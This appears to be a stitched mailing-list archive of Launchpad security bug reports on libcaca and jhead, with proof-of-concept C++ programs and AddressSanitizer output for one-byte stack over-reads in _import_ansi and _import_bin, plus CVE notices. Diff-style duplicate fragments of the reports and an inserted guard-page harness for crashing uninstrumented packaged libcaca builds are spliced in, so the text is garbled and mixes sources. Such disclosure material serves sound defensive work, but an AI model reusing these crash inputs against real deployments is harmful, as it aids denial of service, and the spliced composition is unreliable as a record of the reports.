- size_t  len = 0;
- unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
  
- return 0;
+ return 0;
  
  }
  4.compile poc_ansi.cc
  
  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:
  
  =
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
- #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
+ #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
  
  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
-   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
-   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
-   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
-   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
+   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
+   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
+   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 

[Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues:https://github.com/cacalabs/libcaca/issues/56
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
+ 
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"bin");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"bin");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
  int main(int args,char* argv[]){
- size_t  len = 0;
- unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
- return 0;
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
+ return 0;
  
  }
  4.compile poc_bin.cc
  
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:
  
  =
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
- #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+ #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
  
  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
-   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

[Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

```bash
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
```
or

```bash
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
$ make
```
3.Create the poc_ansi.cc && build

```cpp
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <cstdint>   // uint8_t
#include <cstddef>   // size_t
#include <cstdio>    // printf

using namespace std;

// Import the bytes as an "ansi" canvas; the out-of-bounds read happens inside
// caca_import_canvas_from_memory() -> _import_ansi().
void crash(const uint8_t *Data, size_t Size) {
    if (Size < 8) return;
    caca_canvas_t *cv = caca_create_canvas(0, 0);
    caca_create_frame(cv, 0);
    caca_set_frame(cv, 0);
    caca_import_canvas_from_memory(cv, Data, Size, "ansi");
    caca_free_canvas(cv);
    cv = NULL;
}

int main(int argc, char *argv[]) {
    // 10-byte input: the importer reads one byte past the end of this buffer.
    unsigned char buffer[] = {0x20, 0x4a, 0x0c, 0x0a, 0x20, 0x0a, 0x20, 0x0c, 0x0c, 0x0c};
    size_t len = sizeof(buffer) / sizeof(unsigned char);
    printf("%zu\n", len);
    crash((const uint8_t *)buffer, len);
    return 0;
}
```
4.compile poc_ansi.cc

```bash
clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi
```

5.Run poc_ansi
asan info:

```
=================================================================
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
    #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38
    #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
    #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
    #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
    #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
    [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
  0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
  0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
  0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
  0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3763372==ABORTING
```
Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925467/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1. Get the source code of libcaca
2. Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make

or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" \
    CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
$ make

3. Create poc_bin.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <cstdio>
#include <cstdint>
#include <cstddef>

using namespace std;

// Hand the bytes to the "bin" importer. The out-of-bounds read happens
// inside caca_import_canvas_from_memory(), so libcaca itself must be built
// with AddressSanitizer for the report below to appear.
void crash(const uint8_t *Data, size_t Size) {

  if (Size < 8) return;
  caca_canvas_t *cv;
  cv = caca_create_canvas(0, 0);
  caca_create_frame(cv, 0);
  caca_set_frame(cv, 0);
  caca_import_canvas_from_memory(cv, Data, Size, "bin");
  caca_free_canvas(cv);
  cv = NULL;

}

int main(int argc, char *argv[]) {
size_t len = 0;
// 13-byte input; the importer reads one byte past its end (offset 13)
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%zu\n", len);   // "%zu", not "%d": the argument is a size_t
crash((const uint8_t*)buffer, len);
return 0;

}
4. Compile poc_bin.cc

clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address \
    -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin

5. Run poc_bin

ASan info:

=================================================================
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
    #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
    #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
    #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
    #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
    #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
    [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
  0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
  0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3817476==ABORTING

Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions

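Both libcaca reports above (1925467 for _import_ansi, 1925468 for _import_bin) show the same thing: a READ of size 1 at offset 42 or 45 of a 10- or 13-byte stack buffer, i.e. exactly one byte past the end, which only an AddressSanitizer build of libcaca makes visible. The following is an added example, not code from the reports or from libcaca, that makes the same PoC bytes fault on an uninstrumented build too (for instance a distribution's packaged libcaca0), by copying them so that they end flush against an unmapped guard page. It assumes a POSIX system with mmap/mprotect and sigaction; the names guarded_copy, read_faults and demo_guard are the example's own, and the input is the 13-byte poc_bin buffer from the report.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Copy size bytes so that they end exactly where a PROT_NONE guard page
 * begins; *map_len receives the mapping length for guarded_free(). */
static uint8_t *guarded_copy(const uint8_t *data, size_t size, size_t *map_len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t data_pages = (size + page - 1) / page;
    if (data_pages == 0)
        data_pages = 1;
    size_t len = (data_pages + 1) * page;

    uint8_t *base = mmap(NULL, len, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return NULL;
    /* Last page is the guard: any access to it raises SIGSEGV. */
    if (mprotect(base + data_pages * page, page, PROT_NONE) != 0) {
        munmap(base, len);
        return NULL;
    }
    uint8_t *p = base + data_pages * page - size;
    memcpy(p, data, size);
    *map_len = len;
    return p;
}

static void guarded_free(uint8_t *p, size_t size, size_t map_len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    munmap(p + size - (map_len - page), map_len);
}

/* Probe one byte and report whether the read faulted, without dying. */
static sigjmp_buf probe_env;

static void probe_handler(int sig)
{
    (void)sig;
    siglongjmp(probe_env, 1);
}

static bool read_faults(const uint8_t *addr)
{
    struct sigaction sa, old_segv, old_bus;
    volatile bool faulted = false;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = probe_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_NODEFER;
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    if (sigsetjmp(probe_env, 1) == 0) {
        uint8_t v = *(const volatile uint8_t *)addr;  /* the probed read */
        (void)v;
    } else {
        faulted = true;
    }

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return faulted;
}

/* Self-check with the poc_bin bytes: returns 1 when the last in-bounds
 * byte reads fine and the byte after it (offset 13, as in the ASan report)
 * faults. A real run would hand p to caca_import_canvas_from_memory(). */
int demo_guard(void)
{
    static const uint8_t poc[] = {
        0x0a, 0x20, 0x0a, 0x0a, 0x20, 0x20, 0x20,
        0x20, 0x20, 0x20, 0x47, 0x47, 0x47
    };
    size_t map_len = 0;
    uint8_t *p = guarded_copy(poc, sizeof poc, &map_len);
    if (p == NULL)
        return 0;
    bool last_ok = !read_faults(p + sizeof poc - 1) && p[sizeof poc - 1] == 0x47;
    bool past_faults = read_faults(p + sizeof poc);
    guarded_free(p, sizeof poc, map_len);
    return (last_ok && past_faults) ? 1 : 0;
}

int main(void)
{
    int ok = demo_guard();
    printf("guard page check: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```

To use this against a packaged library, replace the two read_faults() probes in demo_guard() with the crash() body from the PoC (canvas creation, caca_import_canvas_from_memory(cv, p, sizeof poc, "bin"), canvas free): an uninstrumented _import_bin that reads offset 13 then dies with SIGSEGV instead of silently returning, which is what you want when confirming that a distribution build is affected. The probe helper is only there to prove the guard page works; it should not be installed around the library call itself, since a fault inside libcaca would then longjmp over its cleanup.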
[Bug 1923538] Re: jhead heap-buffer-overflow of exif.c in function Get16u

2021-04-13 Thread xiao huang
The issue has been assigned CVE-2021-3496.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3496

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1923538

Title:
  jhead heap-buffer-overflow of exif.c in function Get16u

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1923538/+subscriptions

[Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-12 Thread xiao huang
The issues have been assigned CVE-2021-30498 and CVE-2021-30499.

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions

[Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-11 Thread xiao huang
** Summary changed:

- libcaca buffer-overflow
+ buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions

[Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
Debian 10
libcaca0/now 0.9.beta19-2.1

Fedora 33
Name    : libcaca
Version : 0.99
Release : 0.51.beta19.fc33

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions

[Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
source code
## Affected Product Code Base
libcaca, 0.99.beta20


Ubuntu 20.04
libcaca 0.99.beta19

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions

[Bug 1919305] Re: gpac application crashes on read

2021-04-09 Thread xiao huang
Thank you

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to the bug report.
https://bugs.launchpad.net/bugs/1919305

Title:
  gpac application crashes on read

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gpac/+bug/1919305/+subscriptions